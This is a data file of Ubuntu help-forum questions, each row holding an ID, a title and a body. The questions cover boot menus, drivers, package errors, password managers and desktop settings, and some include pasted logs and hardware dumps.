104923	running programs as root while online	i 'm remastering an ubuntu based distro , meant to be used live only and primarily as a browser so a users hard-drive can be virus free while online . this live browsing adds security for linux users , but seconds as a guardian for windows and mac users hardrive . it is a nice invitation for their users to take a look at what the linux os has to offer to help protect their chosen os 's . i 'm adding an easy grandma tutorial so they can remaster it with all their browser and user space customizations . most users will want a password manager to help them sign into their accounts . i 'm using firefox , but the firefox password manager once opened with the master password will give any requesting service that knows how to make a request unhindered access to all encrypted passwords . due to this , i 've decided to go with a stand alone password manager which will give some permission flexibilities to help deal with those issues . keepassx has been the main choice . there is a similar problem , in that , malicious code could access the keepassx data base because both malicious code and keepassx would share the same privileges in the online users space . in order to add more security , i 'm considering changing keypassx permisions so the keepassx data base is not accessible to the online user , unless the user enters their admin password . this logically would result in making it harder for an attacker to access . although , i 'm new to setting up security environments . therefore my question ... is it a good idea and safe to force keepassx only to be launched as root user on ubuntu , taking in mind the user will be online with firefox ?
104927	no grub menu at start up after installing ubuntu 11.10	i had dual boot with windows xp and ubuntu 10.4 on my pc . i have installed ubuntu 11.10 on the ubuntu 10.4 . after restart it is directly entering into ubuntu 11.10 . there is no menu at start up for selecting operating system .
104931	install freezes at the wireless screen	i have a toshiba satellite with an amd turion x2 that i am trying to install ubuntu on using a usb stick . the hardrive has windows vista on it but is from a different laptop so it is not accessible . i set it up to boot from the usb and it seems to work until the wireless portion where you select the network . it freezes there everytime . i got the stick from a friend who used it to install ubuntu on his laptop and it worked for him . any help would be great .
104935	usb will not work after most recent update	please bare with me as i am a noob . i have had ubuntu 10.10 for a year with no problems and completely love it ... two days ago i did my latest updates through update manager and now my usb ports do not work ... i use a mouse because my trackpad is terrible . the mouse lights up , so it has power , but it will not move . i 've tried my printer and phone as well to no avail . any tips would be greatly appreciated ... after typing tail -f /var/log/kern.log in the terminal , it repeatedly says `` unable to enumerate usb device on port 1 '' over and over again ... sudo lsusb shows my mouse . bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 006 : id 046d:09b8 logitech , inc . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
104939	should i keep an experimental kubuntu ppa ?	on a recent clean kubuntu 11.10 64 bit install , muon package manager and muon software update center would not work . i would just get a bug report . i had to do all the updates through konsole . the only way i could get muon to work was install an experimental version of muon through a ppa , ppa : echidnaman/qapt-experimental . i am not having problems with the experimental version , it seems to work great . i am not a fan of experimental software and i know the cons of having an experimental ppa , like breaking the program on an update , but should i keep the experimental ppa or disable it and count on stable updates ? if i disable the experimental ppa will that cause problems of reverting to the release i am having problems with ?
104940	can i disable the splash screen and output verbose information when i shutdown ?	i 'm using lubuntu 11.10 , though a little different with ubuntu , they may be alike to some extent imo . now i want to disable the splash screen and output verbose information in text mode when i shutdown the system in gui . can anyone give a hand to me ? any help appreciated !
104946	how to connect from my laptop 's display port to my tv 's dvi port ?	i have the connecting cables i need to connect them but when i do my laptop freezes up . i get no display on my tv and i thought maybe i needed to unpack software . please help , i have lots of movies on my hard drive i would like to be able to watch them on my tv . edit : it is the vga port . it has 15 pin holes with an icon of a screen next to it . i have the connector for this port and it is adapted to a dvi cable going to the dvi input port on my hdtv . i am currently running ubuntu 10.04 . again , i am very new to linux and i am not much of a techy . what i am trying to say is , please use the simplest terms possible . there has to be a way to accomplish this , but i just do n't know how . i thought if i just connected them together , it would work , but i must be missing something . i would appreciate any advise with this problem .
104949	is apt-get update lag related to google chrome ?	i have google chrome installed from the google chrome repository . when i run sudo apt-get update , i notice that getting headers relating to google chrome takes more time than is needed to get all the other headers . i thought it was normal but today i came across an ( old ) bug page that initially suggested use of sudo apt-get -o acquire : :http : :pipeline-depth=0 update instead of the basic sudo apt-get update and later stated that the problem was fixed ( by april 2010 ) . however , i feel i 'm currently having the same problem : the process rapidly completes ~97 % in under 5 sec but the remaining ~3 % , involving the google chrome headers , takes a couple of minutes or so more . using sudo apt-get -o acquire : :http : :pipeline-depth=0 update does n't significantly improve things . i 'm using ubuntu 11.10 , fully updated . edit on 20120502 just an observation : i updated to 18.0.1025.168 ( official build 134367 ) and left the ppa ticked but it does n't seem to be a problem now . i see : fetched 6,385 kb in 2min 31s ( 42.0 kb/s ) .
104950	how do i configure apt-get to use a pac file for a proxy ?	in my workplace we use the pac file for proxy network .and the pac file when i give to the browser setting its work fine edit -- > advance -- > network -- > setting . when i gave the url its working fine for me . but for apt-get i was not able to update . i added the same url in the network proxy for that . my pac file have no username or password . please suggest me .how should the apt-get work in my new ubuntu 11.10.i am really struggling a lot to fix this issue
104952	installing ubuntu 11.10 x64 alongside windows 7 x64 does n't boot into ubuntu	it appears that there are lots of `` ubuntu alongside windows '' posts , but i could n't find my answer . my pc 's only os was windows 7 x64 . all of my 750 gb hdd partitions were in ntfs format . yesterday i made 15 gb of unallocated space to install ubuntu 11.10 x64 . during the installation ( installed from usb ) i chose `` install ubuntu alongside windows 7 '' option . after that everything goes smooth and installation was successfully completed . ubuntu asked me to remove the installation media and restart the computer . after restarting the pc , windows 7 was loaded . i was expecting an os selection menu . it appears that ubuntu did n't change master boot record at all . using easeus partition master home edition , i found that ubuntu made 2 partitions in that 15 gb unallocated spaces ( 11 gb + 4 gb ) . so i can assume that ubuntu did get installed where i wanted it to be installed . but i ca n't boot to ubuntu . how can i fix this ? i want to have an os selection menu . i 'm an advanced user of windows but extremely new in linux . please provide enough details so a new user like me understand the process . p.s . i do n't want to use boot repair as it is n't officially supported by canonical .
104953	write desktop background changer in c	i am completely new to writing programs for ubuntu and using the available api . but i wish to write a desktop background changer of my own in c. are there any api available which would help me write my code . i want the direction to take the first step . any help in this regard will be greatly appreciated : ) thank you for your read ! !
104957	is it possible to install android 's .apk file ?	was just wondering it would be nice to have a convenient way of installing android 's .apk apps in ubuntu somehow . somebody has a clue about it ?
104960	how to solve apt-errors encoutered while processing linux-image-2.6.35-31-generic-pae ?	please anybody ! help me remove this problem . am using ubuntu 11.04. i have tried all things ! ! hillary @ mobile : ~ $ sudo apt-get install -f [ sudo ] password for hillary : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : linux-image-2.6.35-31-generic-pae 0 upgraded , 0 newly installed , 1 to remove and 40 not upgraded . 2 not fully installed or removed . after this operation , 108 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 644201 files and directories currently installed . ) removing linux-image-2.6.35-31-generic-pae ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 2.6.35-31-generic-pae /boot/vmlinuz-2.6.35-31-generic-pae run-parts : executing /etc/kernel/postrm.d/zz-update-grub 2.6.35-31-generic-pae /boot/vmlinuz-2.6.35-31-generic-pae /etc/default/grub : 11 : splash : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-2.6.35-31-generic-pae.postrm line 328. dpkg : error processing linux-image-2.6.35-31-generic-pae ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-2.6.35-31-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) hillary @ mobile : ~ $
104964	need owner permissions for root folder	actually i 'm trying to copy some business purpose files into root folder but it 's not allowing to access the root folder . when i 'm trying to change the permissions of the folder , its showing that you are not the owner so that you cant change the permissions of this directory . please help me..
104965	when pressing the super key the dash takes a while to appear	when pressing the super key , the dash takes a while to appear . i know it is being recognized since i can leave it pressed and the shortcut numbers for the icons in the launcher appear but when i press it the dash takes a lot to appear ( between 10 seconds to a full minute ) . this sometimes gets worse if i have firefox opened but in this case everything is closed . i even restarted the pc just to make sure . is there an option to see how long the dash should take to appear or something similar .
104967	how to use ubuntu-provided virtualbox package after uninstalling virtualbox-4.1 ?	i installed oracle virtualbox per the instructions on the oracle website , but ca n't use xp or ubuntu vms after switching back to the ubuntu standard version . to switch back , i have edited /etc/apt/sources.list to remove the oracle repository , did an apt-get update , removed everything with virtualbox in the name using ubuntu software center , and then reinstalled virtualbox and ( after an error message ) virtualbox-dkms packages . i still ca n't start my virtual machines . how can i use the ubuntu version of virtualbox again ? the oracle version crashes on my machine . what are the 'extension packs ' that the virtualbox error message complains about ? these are different from the 'guest additions ' , right ? also , why does re-installing ubuntu virtualbox in software center fail to produce a working virtualization environment ? here is the error message when starting xp in the ubuntu version of virtualbox ( version4.1.2_ubuntu r38459 ) : failed to open a session for the virtual machine xp , defaults . the device helper structure version has changed . if you have upgraded virtualbox recently , please make sure you have terminated all vms and upgraded any extension packs . if this error persists , try re-installing virtualbox . ( verr_pdm_devhlpr3_version_mismatch ) . virtualbox_prob.txt ( end ) and the error for an ubuntu virtual machine : failed to open a session for the virtual machine ubu32 . the device helper structure version has changed . if you have upgraded virtualbox recently , please make sure you have terminated all vms and upgraded any extension packs . if this error persists , try re-installing virtualbox . ( verr_pdm_devhlpr3_version_mismatch ) . result code : ns_error_failure ( 0x80004005 ) result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb }
104972	bcm4312 drops after a while	i 'm running 11.10 with bcm4312 wireless . i can connect to a network just fine , and i can have an internet connection for a while ... but then it drops , but it still says that it is connected on the icon . i ca n't access any pages . any ideas ? i 'm at my university and i ca n't mess with the router ... this is a big problem for me , since i have to listen to a lot of streaming music for my major . help ! ! ! ! ! -ryan
104973	kde - app activator on [ meta ] key	i 'm using kde now . in unity , i could open dash with meta . i want to do the same in kde - open application activator with meta key , but i do n't know , how . in this widget 's properties i ca n't set it .
104976	mamp like tool for ubuntu	i am from mac os x background . to control my apache , mysql , and php , i used to use mamp tool available for mac os x . on my ubuntu , i have installed all the required softwares but , i want a good ui tool to control my apache . to be specific , i change my document root too often , so i want a gui tool to where i can just browse for desired document root , and restart the server . is there any such tool available ?
104982	if i just use a window manager and not a desktop environment , how do i get automatic dock/undock resolution updates ?	gnome and kde both change resolutions when i dock/undock my laptop . they seem to do it automatically , more or less , based on the state of the computer . i 'd like to have that behavior if i just run something like icewm or openbox . or even xfce . any recommendations ?
104985	how to close windows from alt+tab view	is there a way to close open windows directly from alt tab view ? or is there any talk of this feature being included possibly in the future ? thanks in advance .
104988	how can i force déjà-dup to backup only changed and new files ?	every day déjà dup backups it needs a long time because of my pictures-folder . is there a possibility to force déjà dup to backup only new and changed files ?
104997	how to synchronize my banshee 's library to my android 's library ?	i want my banshee 's library to synchronize to my android 's library instead of my android 's library synchronizing to my banshee 's library because my android 's library changes more often than my banshee 's library . so i need it to be the opposite way it is by default , and now . here is a visual example : how it is : banshee 's library â android 's library how i want to be : android 's library â banshee 's library
104998	how do i deinstall ubuntu ?	the version installed is ubuntu 8.10 i386 which i want to deinstall completely . so far i could not find a function in this version by which i could do that . thanks a lot for a helpful advice .
105000	can not boot after compiz and xorg configuration changes	hi guys i have just done a clean install of 11.10 followed [ these instructions ] ( http : //www.howtoforge.com/enabling-compiz-fusion-on-ubuntu-11.10-oneiric-ocelot ) to install compiz . rebooted the machine after adding the nvidia settings to xorg and now ubuntu will not load can somebody post instructions and i will try them tonight .
105001	turn off automatic file extension when renaming files ?	in nautilus i tried to rename a .desktop file , but unity ( or is it gnome ? i suspect it 's unity but please correct me if i 'm wrong ) then renamed the file to end with .desktop.desktop - not what i wanted . after a bit of messing around i guessed that unity was automatically adding a file extension and managed to rename it so it ended with only one .desktop how can i turn off automatic file extension renaming ? or is this the only filetype which has this annoying behaviour ? in which case i can live with it . ( but i 'll be tutting a lot . ; - ) i 'm used to renaming files , so unexpected behaviour in both nautilus and thunar is annoying and gets in the way of my completing simple tasks . thunar is even worse - it does n't show the file extension at all !
105003	how to change desktop font color in xfce when using nautilus to show desktop	i 'm trying to change the desktop font color in xubuntu after i replaced thunar with nautilus to be the default file manager . right now i have gray text color which is not visible on almost any wallpaper . i set up the gtk theme using gnome-tweak-tool but it 's not using it because in the css files and gtkrc file for gtk2 the text color is set to # ffffff
105005	webcam horizontally flipped on dell vostro v13	i 'm not able to find any information regarding this issue . dell vostro supposed to be ubuntu certified and to work fully.. anyway , here 's lsusb : < bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 10f1:1a1e importek laptop integrated webcam 1.3m bus 003 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 003 device 003 : id 413c:8161 dell computer corp . integrated keyboard bus 003 device 004 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] and dmi : # dmidecode 2.9 smbios 2.5 present . 51 structures occupying 1991 bytes . table at 0x000dc010 . handle 0xda00 , dmi type 218 , 197 bytes oem-specific type header and data : da c5 00 da b2 00 d2 1b 0f 36 40 7d 00 00 00 00 00 80 01 16 00 01 00 7f 01 16 00 00 00 52 01 17 00 01 00 53 01 17 00 00 00 7c 01 18 00 01 00 7b 01 18 00 00 00 75 01 75 01 01 00 76 01 76 01 01 00 2e 00 25 00 00 00 6e 00 25 00 01 00 2d 00 25 00 02 00 8a 01 48 00 01 00 89 01 48 00 00 00 9b 00 23 00 01 00 9c 00 23 00 00 00 14 01 46 00 00 00 15 01 46 00 01 00 16 01 46 00 02 00 94 01 47 00 01 00 93 01 47 00 00 00 ea 00 67 00 01 00 eb 00 67 00 00 00 00 fe 00 00 00 00 01 fe 00 00 01 00 a0 fe 00 00 00 00 a1 fe 00 00 01 00 e1 01 01 00 00 00 e2 01 01 00 01 00 e3 01 01 00 02 00 ff ff 00 00 00 00 handle 0x0001 , dmi type 0 , 24 bytes bios information vendor : dell inc . version : a05 release date : 08/27/2010 address : 0xe1ae0 runtime size : 124192 bytes rom size : 2048 kb characteristics : isa is supported pci is supported pc card ( pcmcia ) is supported pnp is supported bios is upgradeable bios shadowing is allowed escd support is available boot from cd is supported acpi is supported usb legacy is supported agp is supported bios boot specification is supported targeted content distribution is supported handle 0x0002 , dmi type 1 , 27 bytes system information manufacturer : dell inc . product name : vostro v13 version : a05 serial number : 4t79jm1 uuid : 44454c4c-5400-1037-8039-b4c04f4a4d31 wake-up type : power switch sku number : not specified family : vostro handle 0x0003 , dmi type 2 , 17 bytes base board information manufacturer : dell inc . product name : 031vj5 version : a05 serial number : .4t79jm1.cn747510ar006d . asset tag : 12345 features : board is a hosting board board is replaceable location in chassis : not applicable chassis handle : 0x0003 type : motherboard contained object handles : 1 0x0000 handle 0x0004 , dmi type 3 , 21 bytes chassis information manufacturer : dell inc . type : portable lock : not present version : a05 serial number : 4t79jm1 asset tag : boot-up state : safe power supply state : safe thermal state : safe security status : none oem information : 0x00000000 height : unspecified number of power cords : unspecified contained elements : 0 handle 0x0005 , dmi type 4 , 40 bytes processor information socket designation : u2e1 type : central processor family : < out of spec > manufacturer : intel id : 7a 06 01 00 ff fb eb bf version : cpu version voltage : 3.3 v external clock : 200 mhz max speed : 4096 mhz current speed : 1300 mhz status : populated , enabled upgrade : zif socket l1 cache handle : 0x0006 l2 cache handle : 0x0007 l3 cache handle : not provided serial number : not specified asset tag : not specified part number : not specified core count : 2 core enabled : 2 thread count : 2 characteristics : 64-bit capable handle 0x0006 , dmi type 7 , 19 bytes cache information socket designation : l1 cache configuration : enabled , socketed , level 1 operational mode : write back location : internal installed size : 64 kb maximum size : 64 kb supported sram types : burst pipeline burst asynchronous installed sram type : asynchronous speed : unknown error correction type : single-bit ecc system type : data associativity : 8-way set-associative handle 0x0007 , dmi type 7 , 19 bytes cache information socket designation : l2 cache configuration : enabled , socketed , level 2 operational mode : write back location : internal installed size : 3072 kb maximum size : 4096 kb supported sram types : burst pipeline burst asynchronous installed sram type : burst speed : unknown error correction type : single-bit ecc system type : unified associativity : other handle 0x0008 , dmi type 8 , 9 bytes port connector information internal reference designator : j19 internal connector type : 9 pin dual inline ( pin 10 cut ) external reference designator : com 1 external connector type : db-9 male port type : serial port 16550a compatible handle 0x0009 , dmi type 8 , 9 bytes port connector information internal reference designator : j1a1 internal connector type : none external reference designator : keyboard external connector type : circular din-8 male port type : keyboard port handle 0x000a , dmi type 8 , 9 bytes port connector information internal reference designator : j1a1 internal connector type : none external reference designator : ps/2 mouse external connector type : circular din-8 male port type : mouse port handle 0x000b , dmi type 9 , 13 bytes system slot information designation : peg slot j6b2 type : 32-bit pci express current usage : available length : long id : 6 characteristics : 5.0 v is provided 3.3 v is provided handle 0x000c , dmi type 9 , 13 bytes system slot information designation : pci express slot j6b1 type : 32-bit pci express current usage : available length : long id : 6 characteristics : 5.0 v is provided 3.3 v is provided handle 0x000d , dmi type 9 , 13 bytes system slot information designation : pci express slot j6d1 type : 32-bit pci express current usage : available length : long id : 8 characteristics : 5.0 v is provided 3.3 v is provided handle 0x000e , dmi type 9 , 13 bytes system slot information designation : pci express slot j8b3 type : 32-bit pci express current usage : in use length : long id : 9 characteristics : 5.0 v is provided 3.3 v is provided handle 0x000f , dmi type 9 , 13 bytes system slot information designation : pci express slot j8d1 type : 32-bit pci express current usage : available length : long id : 10 characteristics : 5.0 v is provided 3.3 v is provided handle 0x0010 , dmi type 9 , 13 bytes system slot information designation : pci express slot j7b1 type : 32-bit pci express current usage : in use length : long id : 11 characteristics : 5.0 v is provided 3.3 v is provided handle 0x0011 , dmi type 9 , 13 bytes system slot information designation : pci express slot 6 type : 32-bit pci express current usage : available length : long id : 12 characteristics : 5.0 v is provided 3.3 v is provided handle 0x0012 , dmi type 10 , 6 bytes on board device information type : sound status : disabled description : hd-audio handle 0x0013 , dmi type 11 , 5 bytes oem strings string 1 : dell system string 2 : 5 string 3 : 13 handle 0x0014 , dmi type 12 , 5 bytes system configuration options option 1 : jumper settings can be described here . handle 0x0015 , dmi type 15 , 29 bytes system event log area length : 16 bytes header start offset : 0x0000 header length : 16 bytes data start offset : 0x0010 access method : general-purpose non-volatile data functions access address : 0x0000 status : valid , not full change token : 0x000000d8 header format : type 1 supported log type descriptors : 3 descriptor 1 : post error data format 1 : post results bitmap descriptor 2 : single-bit ecc memory error data format 2 : multiple-event descriptor 3 : multi-bit ecc memory error data format 3 : multiple-event handle 0x0016 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 4 gb error information handle : not provided number of devices : 1 handle 0x0017 , dmi type 17 , 27 bytes memory device array handle : 0x0016 error information handle : no error total width : 64 bits data width : 64 bits size : 4096 mb form factor : sodimm set : 1 locator : m1 bank locator : bank 0 type : < out of spec > type detail : synchronous speed : 800 mhz ( 1.2 ns ) manufacturer : 80ad serial number : 3483a837 asset tag : 1036 part number : hmt351s6bfr8c-h9 handle 0x0018 , dmi type 17 , 27 bytes memory device array handle : 0x0016 error information handle : no error total width : unknown data width : unknown size : no module installed form factor : sodimm set : 1 locator : m2 bank locator : bank 1 type : unknown type detail : synchronous speed : 800 mhz ( 1.2 ns ) manufacturer : serial number : asset tag : part number : handle 0x0019 , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x001a , dmi type 18 , 23 bytes 32-bit memory error information type : ok granularity : unknown operation : unknown vendor syndrome : unknown memory array address : unknown device address : unknown resolution : unknown handle 0x001b , dmi type 19 , 15 bytes memory array mapped address starting address : 0x00000000000 ending address : 0x000ffffffff range size : 4 gb physical array handle : 0x0016 partition width : 0 handle 0x001c , dmi type 20 , 19 bytes memory device mapped address starting address : 0x00000000000 ending address : 0x000ffffffff range size : 4 gb physical device handle : 0x0017 memory array mapped address handle : 0x001b partition row position : unknown interleave position : unknown interleaved data depth : unknown handle 0x001d , dmi type 20 , 19 bytes memory device mapped address starting address : 0x000fffffc00 ending address : 0x000ffffffff range size : 1 kb physical device handle : 0x0018 memory array mapped address handle : 0x001b partition row position : unknown interleave position : unknown interleaved data depth : unknown handle 0x001e , dmi type 21 , 7 bytes built-in pointing device type : touch pad interface : bus mouse buttons : 2 handle 0x001f , dmi type 22 , 26 bytes portable battery location : system battery bay manufacturer : sanyo manufacture date : 01/12/2009 name : dell 449tx07q chemistry : lithium ion design capacity : 300000 mwh design voltage : 11100 mv sbds version : ver.1028 maximum error : 100 % sbds serial number : 21bd oem-specific information : 0x00000000 handle 0x0020 , dmi type 23 , 13 bytes system reset status : enabled watchdog timer : present boot option : do not reboot boot option on limit : do not reboot reset count : unknown reset limit : unknown timer interval : unknown timeout : unknown handle 0x0021 , dmi type 24 , 5 bytes hardware security power-on password status : disabled keyboard password status : unknown administrator password status : disabled front panel reset status : unknown handle 0x0022 , dmi type 25 , 9 bytes system power controls next scheduled power-on : 12-31 23:59:59 handle 0x0023 , dmi type 26 , 20 bytes voltage probe description : voltage probe location : processor status : ok maximum value : unknown minimum value : unknown resolution : unknown tolerance : unknown accuracy : unknown oem-specific information : 0x00000000 handle 0x0024 , dmi type 27 , 12 bytes cooling device temperature probe handle : 0x0025 type : fan status : ok oem-specific information : 0x00000000 handle 0x0025 , dmi type 28 , 20 bytes temperature probe description : temperature probe location : processor status : ok maximum value : unknown minimum value unknown resolution : unknown tolerance : unknown accuracy : unknown oem-specific information : 0x00000000 handle 0x0026 , dmi type 29 , 20 bytes electrical current probe description : electrical current probe location : processor status : ok maximum value : unknown minimum value : unknown resolution : unknown tolerance : unknown accuracy : unknown oem-specific information : 0x00000000 handle 0x0027 , dmi type 30 , 6 bytes out-of-band remote access manufacturer name : intel inbound connection : disabled outbound connection : enabled handle 0x0028 , dmi type 32 , 20 bytes system boot information status : no errors detected handle 0x0029 , dmi type 39 , 22 bytes system power supply power unit group : 1 location : to be defined by o.e.m name : to be defined by o.e.m manufacturer : to be defined by o.e.m serial number : to be defined by o.e.m asset tag : to be defined by o.e.m model part number : to be defined by o.e.m revision : 2.50 max power capacity : unknown status : present , unknown type : unknown input voltage range switching : unknown plugged : yes hot replaceable : no input voltage probe handle : 0x0023 cooling device handle : 0x0024 input current probe handle : 0x0026 handle 0xb000 , dmi type 176 , 5 bytes oem-specific type header and data : b0 05 00 b0 00 handle 0xb100 , dmi type 177 , 12 bytes oem-specific type header and data : b1 0c 00 b1 1a 0e 00 00 00 00 00 00 handle 0xd000 , dmi type 208 , 12 bytes oem-specific type header and data : d0 0c 00 d0 01 05 fe 00 2b 04 01 02 strings : 20070319 20070319 handle 0xd400 , dmi type 212 , 17 bytes oem-specific type header and data : d4 11 00 d4 70 00 71 00 00 10 2d 2e ff ff 00 00 00 handle 0xd800 , dmi type 216 , 9 bytes oem-specific type header and data : d8 09 00 d8 01 02 01 f0 03 strings : nvidia 111.222.333.444.555555 handle 0xdc00 , dmi type 220 , 20 bytes oem-specific type header and data : dc 14 00 dc 01 f0 00 00 02 f0 00 00 03 f0 04 f0 00 00 00 00 handle 0xdd00 , dmi type 221 , 19 bytes oem-specific type header and data : dd 13 00 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 handle 0xde00 , dmi type 222 , 16 bytes oem-specific type header and data : de 10 00 de 01 02 ff ff 00 00 00 00 00 00 00 00 handle 0x0032 , dmi type 127 , 4 bytes end of table
105009	minimize and show applications	how can i minimize all the apps in unity going to desktop and show all the apps open , just like the top corner compiz function or macosx ? thanks
105020	the installer needs to commit changes to partition , but can not do so because partitions on the following could not be unmounted . /isodevice	the installer needs to commit changes to partition tables , but can not do so because partitions on the following could not be unmounted . /isodevice i 'm installing this from a external 1tb hard drive there is no internal hard drive ... it crashed so i 'm trying to install this via usb hard drive and i keep getting this error ubuntu 11.04 i believe hp touch smart tm2 no disk drive
105022	stop program launching full screen ?	every time i click on the filezilla icon in the launcher it opens maximised . is there any way to make it behave and open as a normal window , and perhaps ideally even remember its window position ?
105024	ubuntu one music sync	all my music has disappeared from the cloud . it was there a few days ago but yesterday when i clicked on the music tab all i got was the info telling me how to sync etc.on the files tab all the music folders are visible . i have synced all the music folders on the pc as instructed . as i am new to ubuntu one and on the month 's trial i need some help as to what to do . can anyone help ?
105028	force disable snapping windows	how can i reliably disable snapping windows ? when i drag a window around by its titlebar and near the upper edge , it tints and wants to maximize if i let go of the mouse then ( trying to park my app there , not cover the whole workspace ! ) until unity becomes more productive for my work style i switched to cairo-dock with effects for now ( which also is not without issues ) . as the logged in user i have run ccsm the compiz manager and disabled snapping windows altogether , and verified many times . does n't seem to care . have n't filed a bug rep yet as maybe there 's some other setting i do n't know about . nothing else results in the compizconfig search when i try snap or snapping . any other ideas ? ubuntu desktop 11.10 32bit , hwinfo : 28 : pci 100.0 : 0300 vga compatible controller ( vga ) [ created at pci.318 ] udi : /org/freedesktop/hal/devices/pci_1002_7145 hardware class : graphics card model : `` ati radeon mobility x1400 '' vendor : pci 0x1002 `` ati technologies inc '' device : pci 0x7145 `` radeon mobility x1400 '' subvendor : pci 0x1025 `` acer incorporated [ ali ] '' subdevice : pci 0x0094 driver : `` radeon '' driver modules : `` drm '' memory range : 0xd0000000-0xd7ffffff ( ro , non-prefetchable ) i/o ports : 0x2000-0x2fff ( rw ) memory range : 0xc8100000-0xc810ffff ( rw , non-prefetchable ) memory range : 0xc8120000-0xc813ffff ( ro , non-prefetchable , disabled ) irq : 46 ( 306 events ) module alias : `` pci : v00001002d00007145sv00001025sd00000094bc03sc00i00 '' driver info # 0 : driver status : radeon is active driver activation cmd : `` modprobe radeon '' config status : cfg=new , avail=yes , need=no , active=unknown attached to : # 13 ( pci bridge )
105030	what is happening ? i/o error , dev sda , sector 545868115	since a few days ago , my computer freezes whenever i sync my hdd with an external usb3 drive . when the keyboard gets temporarily a bit responsive i am able to switch to another terminal ( ctrl+alt+f2 ) and i see the following image repeating continuously . i am on ubuntu 11 using luckybackup . what is going on ? is my hdd defective ? is it the external one ? something else ? many thanks !
105031	eclipse menu disappeared ( another one )	i encountered the ( most likely ) same strange behaviour as another user , but i 'm quite certain , it has something to do with an update to ubuntu itself within the last week or two . what have i done ? - used eclipse 3.7 ( indigo ) within 11.10 for month , the menu showed up - as predicted - as a seperate menu , not a global one - my own rcp application is successfully showing a global menu . an update occured ... - the menu vanished . neither ubuntu_menuproxy nor appmenu_display_both is helping - even tried this one - but to no avail so until now the information i can provide is not very helpful , but starting eclispe from console and watching the start of my own applications , i 've recognized some new debug messages : ** message : a new manager occured at org.globalmenu.manager , :1.6 ** ( eclipse:16040 ) : debug : gtk-menubar-gtk2.vala:25 : map called by the way : my own eclipse rcp applications , still working perfectly ( ok , as good as i 've programmed them and that might be far from perfect ) .` the following lines also appear during the startup of my app ** message : a new manager occured at org.globalmenu.manager , :1.6 ** ( swt:21632 ) : debug : gtk-menubar-gtk2.vala:25 : map called ** ( swt:21632 ) : debug : gtk-menubar-gtk2.vala:25 : map called but they do n't seem to have any negative effect . there is also a syserr call on exiting the rcp app : ( swt:21632 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion `gtk_is_menu_shell ( menu ) ' failed but this is `` old news '' and i never encountered any sideeffects with this .
105033	making existing userlevel program root ?	is it possible to give root to an already running application which runs at userspace ? like x program is running , i did some unsaveable work on x program , but it needs root to complete . i do not want to restart the x program .
105035	restoring gpg files in ubuntu one	i 'm trying to restore my backup from ubuntu one , but the restored files have the .gpg file extension . i do n't now how to extract these files . i now that these are my files , because the total size of the files is almost the same as that of my original files . how can i export these files to replace my original files ?
105040	how do i force a user to change the password periodically ?	i 'm by far no network admin , but i know on the pc i use at work , we need to change our passwords every 30 or 45 days . is there something like that on ubuntu that can prompt users to change their passwords every 30 , 45 or whatever days i specify ?
105042	how to delete files irreversibly ?	i read that the files which are permanently deleted still can be recovered with some utilities and methods . i want to know how can i delete those permanently deleted files so that they can not be recovered any more , with any methods and any utility ? never ever again . and in the future what should we use to delete files forever ?
105045	how do i parse emails with mutt ?	how would i go about parsing new message subject lines non-interactively using mutt ? mutt is already configured and fetches mail from our exchange server . what i 'd like is for an action to be triggered when a message arrives in my inbox with a certain subject line . and this would have to be non-interactive , as it is for scripting purposes . any and all help is appreciated . i have googled extensively but to no avail . thank you !
105047	late sound in flash	i am learning linux and now have ubuntu 11.10 , 10.10 on my pc . the problem is on both . the problem occured with playing flash via web . flash does not lag , but the sound is going late for some seconds . i tried to google that problem , but yet i ca n't find any good manual . i tried to delete/reinstall flashplugin-nonfree . nothing . i tried all browsers from software centre . nothing again . please , help me . i do n't want to get rid of ubuntu only because of that problem . thanks . ps . sorry for my english , i am not from e-speaking country .
105048	exim paniclog has non-zero size ... ?	i 'm getting the following error from my ubuntu server : exim paniclog /var/log/exim4/paniclog on ( my server fqdn ) has non-zero size , mail system might be broken . i found a solution on the web here . basically , i just need erase the paniclog by entering the following code : sudo rm /var/log/exim4/paniclog so , i know how to get rid of the error , but i do n't know how it started , and how to not let it happen again . any explanation ? thanks in advance .
105051	is it possible to create an installation disk of ubuntu , from an already existing installation ?	i 'm using ubuntu 11.10 , and wondering if it is possible to create an installation disk/image from my existing installation . i need to install it on my friend 's pc . i 'm just wondering , can it be done , or do i have to download the whole installation again ? if any are wondering why i would bother to do this , it is just because internet speed here is n't any good , monthly quota is pretty low , and the prices are even worse .
